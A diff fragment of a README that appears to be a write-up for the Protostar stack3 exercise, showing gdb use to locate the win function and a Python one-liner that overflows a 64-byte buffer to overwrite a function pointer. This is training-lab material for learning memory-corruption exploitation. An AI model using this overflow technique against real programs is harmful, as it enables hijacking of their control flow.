le91688/protostar/README.md

  8048436:	c9                   	leave
  8048437:	c3                   	ret
 ```
+####gdb
+simply use x win in gdb to print the memory location of win

-this indicates win is at 0x08048424 in memory, so we craft an input that overflows into fp with this location (adjusted for endianess)
+we now know win is at 0x08048424 in memory, so we craft an input that overflows into fp with this location (adjusted for endianess)
 ###winning command:
 ```bash
 python -c "print 'a'*64+'\x24\x84\x04\x08'" | ./stack3